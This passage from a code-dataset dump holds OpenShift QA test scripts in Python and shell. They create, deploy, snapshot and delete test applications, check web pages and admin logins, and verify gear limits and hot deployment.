"/automation/open/testmodules/RT/cartridge/git_repo_cleanup_gc.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nFeb 23, 2012\n\n[US1107][rhc-cartridge] App git repo cleanup using git gc\nhttps://tcms.engineering.redhat.com/case/122511/\n\"\"\"\n\nimport os\nimport sys\nimport re\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\n self.summary = \"[US1107][rhc-cartridge] App git repo cleanup using git gc\"\n test_name = \"python\"\n self.app_type = common.app_types[test_name]\n self.app_name = 'my%s%s' % ( test_name, common.getRandomString() )\n self.git_repo = './' + self.app_name\n self.steps = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass GitRepoCleanupGc(OpenShiftTest):\n def test_method(self):\n self.steps.append(testcase.TestCaseStep(\n 'Creating an application',\n common.create_app,\n function_parameters = [ self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n False, self.git_repo ],\n expect_description = 'The app should be created successfully',\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Performing 'git gc' and comparing git repo sizes\",\n self.comparing_git_repo_size,\n expect_description = \"The new size of the git repo must be less than it was before 'git gc'\",\n expect_return = 1)) # It's a Python function, so it returns 1 if the comparation was successfull\n\n\n case = testcase.TestCase(self.summary, self.steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def comparing_git_repo_size(self):\n \"\"\"\n This functions returns 1 if the comperation was successfull ( new_size < original_size)\n Returns 0 otherwise\n \"\"\"\n try:\n original_size = common.get_git_repo_size(self.app_name)\n except Exception as e:\n raise rhtest.TestIncompleteError(str(e))\n\n ( gc_rc, gc_output ) = common.run_remote_cmd(self.app_name, r\"cd git/%s.git && git gc\" % ( self.app_name ))\n if gc_rc != 0:\n print \"Failed to execute 'git gc'\"\n return 0\n\n try:\n new_size = common.get_git_repo_size(self.app_name)\n except Exception as e:\n raise rhtest.TestIncompleteError(str(e))\n\n if int(new_size) < int(original_size):\n return 1\n else:\n return 0\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(GitRepoCleanupGc)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6051847338676453, "alphanum_fraction": 0.6102502942085266, "avg_line_length": 30.660377502441406, "blob_id": "0709f78153eaa9653aa556380858666799bf694c", "content_id": "6187c9003bd8f786a04cc559a8c76e9df22f7518", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3356, "license_type": "no_license", "max_line_length": 118, "num_lines": 106, "path": "/automation/open/testmodules/RT/quick_start/quick_start_django_login.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport rhtest\nimport common\nimport OSConf\nimport re\nimport pycurl\nimport os\nfrom time import sleep\nfrom StringIO import StringIO\nimport urllib\n\n# user defined packages\nfrom quick_start_django import QuickStartDjango\n\nclass QuickStartDjangoLogin(QuickStartDjango):\n \n def __init__(self, config):\n QuickStartDjango.__init__(self, config)\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: django - Logging into admin interface\"\n self.config.cookie_file = \"/tmp/%s.txt\" % common.getRandomString(30)\n\n def finalize(self):\n QuickStartDjango.finalize(self)\n if os.path.exists(self.config.cookie_file):\n os.remove(self.config.cookie_file)\n \n\n def deployment_steps(self):\n # Deploying\n ( ret_code, ret_output ) = QuickStartDjango.deployment_steps(self)\n \n # Looking for the admin password\n admin_password = \"\"\n match = re.search(r'Django application credentials.*\\n.*\\nremote:[^\\w]*([\\w]*).*\\n', ret_output, re.MULTILINE)\n if match:\n admin_password = match.group(1).strip()\n\n self.assert_true(admin_password != \"\")\n self.config.admin_password = admin_password\n\n self.info(\"Admin password found: \" + self.config.admin_password)\n\n def verification(self):\n self.log_info(\"Verifying\")\n sleep(10) # Waiting 10 minutes for the application\n\n # Fetching the form to get CSRF cookie\n admin_page = \"http://\" + OSConf.get_app_url(self.config.application_name) + \"/admin/\"\n b = StringIO()\n self.info(\"Fetching admin form...\")\n self.info(\"Admin page URL: \" + admin_page)\n curl = pycurl.Curl()\n curl.setopt(pycurl.URL, admin_page)\n curl.setopt(pycurl.VERBOSE, 1)\n curl.setopt(pycurl.COOKIEJAR, self.config.cookie_file)\n curl.setopt(pycurl.WRITEFUNCTION, b.write)\n curl.setopt(pycurl.FOLLOWLOCATION, 1)\n curl.perform()\n\n match = re.search(r\"name='csrfmiddlewaretoken' value='(.+)'\", b.getvalue())\n csrf_cookie = \"\"\n if match:\n csrf_cookie = match.group(1) \n self.info(\"CSRF Cookie: \" + csrf_cookie)\n \n # Logging in \n admin_page_html = StringIO()\n curl.setopt(pycurl.POST, 1)\n curl.setopt(pycurl.WRITEFUNCTION, admin_page_html.write)\n post_data = urllib.urlencode(\n {\n 'username' : 'admin' ,\n 'password' : self.config.admin_password,\n 'this_is_the_login_form' : 1,\n 'next' : '/admin/',\n 'csrfmiddlewaretoken' : csrf_cookie\n }\n )\n curl.setopt(pycurl.POSTFIELDS, post_data)\n curl.perform()\n\n admin_page_html_source = admin_page_html.getvalue()\n self.info(\"=\"*30)\n self.info(admin_page_html_source)\n self.info(\"=\"*30)\n\n self.assert_true(admin_page_html_source.find(\"Site administration\") != -1)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartDjangoLogin)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7177033424377441, "alphanum_fraction": 0.7368420958518982, "avg_line_length": 15.076923370361328, "blob_id": "5ff8171ce06b851ffc854f31a40946602922de5c", "content_id": "c0080cdd9a1750430a86415f91746d49afbcacdb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 209, "license_type": "no_license", "max_line_length": 36, "num_lines": 13, "path": "/automation/multi_browser.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\n\n\nfrom ipdb import set_trace\nset_trace()\n\n\ndriver1 = webdriver.Firefox()\ndriver2 = webdriver.Firefox()\n\ndriver1.get('http://www.baidu.com')\n\ndriver2.get('http://www.google.com')\n" }, { "alpha_fraction": 0.5885341167449951, "alphanum_fraction": 0.6044992804527283, "avg_line_length": 28.319149017333984, "blob_id": "c31343dfdda9ac238be6f0f334563bbc7b6eb45c", "content_id": "388c90cc2b8dcb91d961406c06004f2c9465f5c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1378, "license_type": "no_license", "max_line_length": 83, "num_lines": 47, "path": "/automation/open/Longevity/longevity.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\napp_type=$1\npwd=$(pwd)\ntime=$(date +%Y%m%d-%H%M%S)\nlog=\"$pwd/${0%.*}_${time}.log\"\n\n#no parameter\napp_create_all()\n{\n\tfor scale in on off;do\n\t\tfor app in $app_types;do\n\t\t\tif [ \"$app\" = \"diy-0.1\" ] && [ \"$scale\" = \"on\" ];then\n\t\t\t\techo \"Diy is cann't support scalable !\"\n\t\t\t\tcontinue\n\t\t\tfi\n\t\t\tfor cartridge_type in $cartridges;do\n\t\t\t\tif [ \"$scale\" = \"on\" ] && [ \"$cartridge_type\" = \"cron-1.4\" ];then\n\t\t\t\t\techo \"Cron-1.4 is can not embedded to scalable application!\"\n\t\t\t\telif [ \"$app\" = \"jbosseap-6.0\" ] && [ \"$cartridge_type\" = \"cron-1.4\" ];then\n\t\t\t\t\techo \"Cron-1.4 is not support at jbosseap-6.0\"\n\t\t\t\telif [ \"$scale\" = \"off\" ];then\n\t\t\t\t\trun app_create $app\n\t\t\t\t\trun url_check $app_name\n\t\t\t\t\trun cartridge_add $cartridge_type $app_name\n\t\t\t\t\trun url_check $app_name\n\t\t\t\t\techo \"$app_name\t\t$cartridge_type\t\t\tnoscalable\t\t$(date +%Y%m%d-%H%M%S)\" >> $log\n\t\t\t\telse\n\t\t\t\t\trun app_create $app -s\n\t\t\t\t\trun cartridge_add $cartridge_type $app\n\t\t\t\t\techo \"$app_name\t\t$cartridge_type\t\t\tscalable\t\t\t$(date +%Y%m%d-%H%M%S)\" >> $log\n\t\t\t\tfi\n\t\t\tdone\n\t\tdone\n\tdone\n\techo_yellow \"Already have $(($app_number+1)) applications\"\n}\n\n. ./function.sh\nrun set_running_parameter\nwhile true;do\n\t[ -d testdir ] && rm -rf testdir/* || mkdir testdir\n\tcd testdir\n\trhc domain show -predhat|grep jenkins-1.4 > /dev/null\n\t[ $? -ne 0 ] && run app_create jenkins-1.4\n\trun app_create_all\n\trun app_delete_all\ndone\n" }, { "alpha_fraction": 0.692556619644165, "alphanum_fraction": 0.6957928538322449, "avg_line_length": 31.526315689086914, "blob_id": "14145bd659e9029059fac5fecf54f5e463d6c899", "content_id": "987a06b73709a47c557712f967d84328815ec043", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 618, "license_type": "no_license", "max_line_length": 121, "num_lines": 19, "path": "/automation/open/Longevity/hot_deploy.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n. ./function.sh\napp_name=$1\n\nrun add_hot_deploy $app_name\nrun app_service_pid $app_name\npids_before_push=$pids\n#git push\nrun app_modify_and_push $app_name\nrun url_check $app_name \"${app_name}-Welcome to OpenShift\"\nrun app_service_pid $app_name\npids_after_push=$pids\necho_bold \"pids_before_push = $pids_before_push\"\necho_bold \"pids_after_push = $pids_after_push\"\nfor pid in $pids_before_pus;do\n cat $pids_after_push |grep $pid >/dev/null\n [ $? -eq 0 ] && echo_bold \"$pid still existed!\" || echo_red \"$pid can't found after pussed, please check!\";break \ndone\necho_green \"hot_deploy successed!\"\n" }, { "alpha_fraction": 0.5708644986152649, "alphanum_fraction": 0.587697446346283, "avg_line_length": 36.5859375, "blob_id": "f1c13ea5372273503ad7596a71313f7d9916f0fd", "content_id": "a0ac744b5697c7be5e6ea38ea788686d538ed620", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4814, "license_type": "no_license", "max_line_length": 163, "num_lines": 128, "path": "/automation/open/testmodules/UI/web/case_138635.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_138635.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckAppsListPage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n \n #check with invalid password\n #web.go_to_home()\n #web.go_to_signin()\n #web.input_by_id(\"web_user_rhlogin\", \"[email protected]\")\n #web.input_by_id(\"web_user_password\", \"redhat\")\n #web.click_element_by_xpath(\"//input[@id='web_user_submit']\")\n web.login()\n\n #web.delete_app(\"python\")\n #create a python app\n web.create_app(\"python-2.6\",\"python\")\n\n\n #check wether the links are correct\n #time.sleep(20)\n #go to the app list page\n web.go_to_app_detail(\"\")\n\n #check the \"app overview\" link\n web.click_element_by_xpath('''//section[@id='app-list']/div/div/div/h2/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''PYTHON''','''/html/body/div/div/div/div/div/div/nav/ul/li[2]/a''')\n web.go_back()\n #check the \"appurl\" link\n web.click_element_by_xpath('''//section[@id='app-list']/div/div/div/div/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Welcome To OpenShift''','''//body/h1''')\n web.go_back()\n #check the \" Add Application\" link\n web.click_element_by_xpath('''//section[@id='app-list']/div[2]/a/strong''')\n time.sleep(2)\n #web.assert_text_equal_by_xpath('''Create a New Application''','''//div[@id='content']/div/div/div/div[2]/div/h1''')\n web.go_back()\n #check the \"Developer Center\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Developer Center''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''')\n web.go_back()\n #check the \"OpenShift User Guide\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''OpenShift''','''//div[@id='id2789633']/div/div/div/span''')\n web.go_back()\n\n #check the \"Installing OpenShift client tools on Mac OSX, Linux, and Windows\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul/li[3]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Get Started with OpenShift''','''//div[@id='content']/div/div/div//div/div/h1''')\n web.go_back()\n #check the \"Sync your OpenShift repo with an existing Git repo\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul/li[4]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Knowledge Base''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''')\n web.go_back()\n #check the \"More help »\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul/li[5]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Create''','''//div[@id='content']/div/div/div/div[2]/div/section/div/h2''')\n web.go_back()\n #check the \"How do I start a new Forum discussion?\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul[2]/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''How do I start a new Forum discussion?''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''')\n web.go_back()\n #check the \"How do I install the rhc client tools on Windows?\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul[2]/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''How do I install the rhc client tools on Windows?''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''')\n web.go_back()\n #check the \"More FAQs »\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul[2]/li[3]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Frequently Asked Questions''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''')\n \n #delete a python app\n web.delete_app(\"python\")\n\n\n self.tearDown()\n\n return self.passed(\" case_138635--CheckAppsListPage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckAppsListPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_138635.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7354430556297302, "alphanum_fraction": 0.7481012940406799, "avg_line_length": 27.214284896850586, "blob_id": "2440c6da9e20cbea9eb88c3ed2203c3dbc843f0d", "content_id": "900301a1a375f6bc5d1ee40e6418896f0b24ce7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 790, "license_type": "no_license", "max_line_length": 109, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbosseap_exploded_wars_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 7, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom jbossas_exploded_wars_without_jenkins import JBossHotDeployExplodedWarsWithoutJenkins\n\nclass EAPHotDeployExplodedWarsWithoutJenkins(JBossHotDeployExplodedWarsWithoutJenkins):\n def __init__(self, config):\n JBossHotDeployExplodedWarsWithoutJenkins.__init__(self, config)\n self.config.application_type = common.app_types['jbosseap']\n self.config.summary = \"[US2443] Hot deployment support for Jboss-Eap6 application with exploded wars\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EAPHotDeployExplodedWarsWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5876638293266296, "alphanum_fraction": 0.5903750658035278, "avg_line_length": 40.74528121948242, "blob_id": "c7f150633d0b99fb453e2e11cfd90331d2930b53", "content_id": "6d399ec1d47a8b1c04f08d6cfede0622e6f0a5d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4426, "license_type": "no_license", "max_line_length": 144, "num_lines": 106, "path": "/automation/open/testmodules/RT/node/app_limit_per_user_normal_creation.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport string\nimport rhtest\nimport common\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary= \"Application limit per user validation on single/multiple node\"\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[\"php\"]\n self.app_name_prefix = common.getRandomString(5)\n try:\n #self.app_limit_per_user = string.atoi(os.environ[\"OPENSHIFT_app_limit_per_user\"])\n self.app_limit_per_user = self.config.tcms_arguments['app_limit']\n if self.app_limit_per_user == 'auto':\n self.info(\"Found AUTO -> getting max_gears via REST API\")\n self.app_limit_per_user = common.get_max_gears()\n except:\n import traceback\n traceback.print_exc(file=sys.stderr)\n try:\n self.app_limit_per_user = common.get_max_gears()\n # $OPENSHIFT_app_limit_per_user is obsolete\n self.info(\"Missing tcms_arguments['app_limit'] in config. Used %s as default (obtained from REST API).\"%self.app_limit_per_user)\n except Exception as e:\n import traceback\n traceback.print_exc(file=sys.stderr)\n self.abort(\"Unable to get max_gears per this user: %s\"%str(e))\n #self.app_limit_per_user = common.MAX_GEARS\n\n self.info(\"Testing limit for user: %s\"%self.app_limit_per_user)\n self.app_name = \"%s%s\" %(self.app_name_prefix, self.app_limit_per_user + 1)\n self.info(self.summary)\n # we need to be sure, that there are no other apps per this account\n common.env_setup() \n\n def finalize(self):\n if self.get_run_mode() == \"DEV\":\n ret = common.set_max_gears(self.user_email, common.DEV_MAX_GEARS)\n if ret != 0:\n self.info(\"Failed to set max gears back to %d\" % (common.DEV_MAX_GEARS))\n else:\n self.info(\"Successfully set max gears back to %d\" % (common.DEV_MAX_GEARS))\n os.system(\"rm -rf *%s\" %self.app_name_prefix)\n for i in range(0, self.app_limit_per_user):\n app_name = \"%s%s\" %(self.app_name_prefix, i)\n try:\n common.destroy_app(app_name, self.user_email, self.user_passwd)\n except:\n pass\n\nclass AppLimitPerUserNormalCreation(OpenShiftTest):\n\n def create_apps_one_by_one(self, start, end):\n for i in range(start, end):\n app_name = \"%s%s\" %(self.app_name_prefix, i)\n self.info(\"Creating app#%d\"%i)\n ret = common.create_app(app_name, self.app_type, self.user_email, self.user_passwd, False)\n self.assert_equal(0, ret, \"App #%d must be created successfully\"%i)\n return 0\n\n def test_method(self):\n if self.get_run_mode() == 'DEV':\n self.add_step(\"Set max gear to %d\" % (self.app_limit_per_user),\n common.set_max_gears,\n function_parameters = [self.user_email, self.app_limit_per_user],\n expect_return = 0,\n expect_description = \"Max gear should be set successfully\")\n\n self.add_step(\"Create %s apps one by one according to app_limit_per_user setting\" %(self.app_limit_per_user),\n self.create_apps_one_by_one,\n function_parameters = [0, self.app_limit_per_user],\n expect_return = 0,\n expect_description = \"Apps should be created successfully\")\n\n self.add_step(\"Try to create one more app to validate app_limit_per_user\",\n \"rhc app create %s %s -l %s -p '%s' %s\" \n %(self.app_name, self.app_type, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_str=[\"already reached the gear limit of\"],\n expect_description=\"No more app should be created\")\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AppLimitPerUserNormalCreation)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.49416136741638184, "alphanum_fraction": 0.502653956413269, "avg_line_length": 41.33707809448242, "blob_id": "ec3f0ec2b8d839fd041f1197184241152b3a0378", "content_id": "166b2b2b3154a0c5af4681ab1b17675c6e51edde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7536, "license_type": "no_license", "max_line_length": 104, "num_lines": 178, "path": "/automation/open/testmodules/RT/client/snapshot_restore_data_dir_to_new_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport common, OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info((\"[US566][rhc-client] Archive an existing app \"\n \"and restore data to new created application\"))\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing variant, using `php` as default.\")\n self.test_variant = \"jbossews\"\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n if self.test_variant == \"perl\":\n file_name = \"index.pl\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/perl/index.pl\" %(self.app_name)\n url_path1 = \"index.pl?action=create\"\n url_path2 = \"index.pl?action=modify\"\n url_path3 = \"index.pl\"\n elif self.test_variant in (\"php\", \"zend\"):\n file_name = \"index.php\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/php/index.php\" %(self.app_name)\n url_path1 = \"index.php?action=create\"\n url_path2 = \"index.php?action=modify\"\n url_path3 = \"index.php\"\n elif self.test_variant in (\"rack\", \"ruby\", \"ruby-1.9\"):\n file_name = \"rack/*\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"wsgi\", \"python\"):\n file_name = \"application.py\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python-2.7\"):\n file_name = \"applicationpython-2.7.py\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python-3.3\"):\n file_name = \"applicationpython-3.3.py\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name) \n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\", \"jbossews\", \"jbossews2\"):\n file_name = \"test.jsp\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/src/main/webapp/%s\" %(self.app_name, file_name)\n url_path1 = \"%s?action=create\" %(file_name)\n url_path2 = \"%s?action=modify\" %(file_name)\n url_path3 = \"%s\" %(file_name)\n else:\n raise rhtest.TestIncompleteError(\"Unknown variant: %s.\"%self.test_variant)\n\n self.file_name = file_name\n self.target_file = target_file\n self.source_file = source_file\n self.url_path1 = url_path1\n self.url_path2 = url_path2\n self.url_path3 = url_path3\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass SnapshotRestoreDataDirToNewApp(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Create a %s application\" %(self.app_type),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, \n self.user_email, self.user_passwd],\n expect_return=0,\n expect_description=\"App should be created successfully\")\n\n self.add_step(\"Copying test files to app git repo\",\n \"cp -f %s %s\" %(self.source_file, self.target_file),\n expect_return=0)\n\n self.add_step(\"Do git commit\",\n \"cd %s && git add . && git commit -m test && git push\" %(self.app_name),\n expect_return=0,\n expect_description=\"File and directories are added to your git repo successfully\")\n\n self.add_step(\"Access app's URL to create files in OPENSHIFT_DATA_DIR directory\",\n self.verify,\n function_parameters = [self.url_path1, \n [\"Welcome\", \"RESULT=0\"]],\n expect_return=0,\n try_interval=12,\n try_count=10)\n\n self.add_step(\"Take snapshot\",\n \"rhc snapshot save %s -f %s -l %s -p '%s' %s\" %(\n self.app_name,\n \"%s.tar.gz\"%(self.app_name),\n self.user_email, \n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0)\n\n self.add_step(\"Destroy app\",\n common.destroy_app,\n function_parameters=[self.app_name, \n self.user_email, \n self.user_passwd, \n True],\n expect_return=0)\n\n self.add_step(\"Re-create this application\",\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd],\n expect_return=0,\n expect_description=\"App should be created successfully\")\n\n self.add_step(\"Restore app from snapshot\",\n \"rhc snapshot restore %s -f %s -l %s -p '%s' %s\" %(\n self.app_name,\n \"%s.tar.gz\"%(self.app_name),\n self.user_email, \n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0)\n\n self.add_step(\"Access app's URL to check OPENSHIFT_DATA_DIR dir is restored\",\n self.verify,\n function_parameters=[self.url_path3, \n [\"Welcome\", \"snapshot_restore_data_dir_test1\"]],\n expect_return=0,\n try_interval=12,\n try_count=10)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n def verify(self, suffix, str_l):\n url=OSConf.get_app_url(self.app_name)\n return common.grep_web_page(\"%s/%s\"%(url,suffix), str_l )\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreDataDirToNewApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5516587495803833, "alphanum_fraction": 0.5579778552055359, "avg_line_length": 30.969696044921875, "blob_id": "0185841b4d1e9a600a2a63015168969258b32739", "content_id": "30ae175b11e4cda38d30d380a1ed6ff1563b8d1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3165, "license_type": "no_license", "max_line_length": 134, "num_lines": 99, "path": "/automation/open/testmodules/RT/cartridge/jbosseap_non_scaling.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nAug 1, 2012\n\"\"\"\n\nimport rhtest\nimport common\n\n\nclass JBossEAP(rhtest.Test):\n def log_info(self, message):\n self.info('=' * 80)\n self.info(message)\n self.info('=' * 80)\n\n def initialize(self):\n self.application_name = common.getRandomString()\n self.summary = '[US2307][RT] Create and Control on-scalingJbossEAP6 App'\n\n\n def finalize(self):\n pass\n\n\n def mysql_status(self):\n cmd = (\"rhc cartridge status -a %s -c %s \"\n \" -l %s -p '%s' %s\") % (self.application_name, \n common.cartridge_types['mysql'], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS)\n return common.command_getstatusoutput(cmd)\n\n\n def test_method(self):\n # Creation\n self.log_info('Creating application')\n common.create_app(\n self.application_name,\n common.app_types['jbosseap'],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(common.check_web_page_output(self.application_name), 0)\n\n # Deployment\n self.log_info('Modifying git repo')\n random_value = common.getRandomString()\n jsp_file = open(self.application_name + '/src/main/webapp/test.jsp', 'w')\n jsp_file.write(random_value)\n jsp_file.close()\n\n configuration_steps = [\n 'cd %s' % self.application_name,\n 'git add .',\n 'git commit -a -m testing',\n 'git push'\n ]\n self.assert_equal(common.command_get_status(' && '.join(configuration_steps)), 0)\n self.assert_equal(common.check_web_page_output(self.application_name, \n 'test.jsp', \n random_value), 0)\n\n # Add MySQL\n self.log_info('Adding MySQL')\n common.embed(self.application_name, 'add-' + common.cartridge_types['mysql'])\n ( ret_code, ret_output ) = self.mysql_status()\n self.assert_true(ret_output.find('MySQL is running') != -1)\n\n # Remove MySQL\n self.log_info('Removing MySQL')\n common.embed(self.application_name, \n 'remove-' + common.cartridge_types['mysql'])\n ( ret_code, ret_output ) = self.mysql_status()\n self.assert_true(ret_output.find(\"%s\" % (common.cartridge_types['mysql'])) != -1, \"Failed to find given string in the output\")\n\n # Remove the app\n self.log_info('Removing the app')\n ret_code = common.destroy_app(self.application_name)\n self.assert_equal(ret_code, 0)\n\n # Everythin is OK\n return 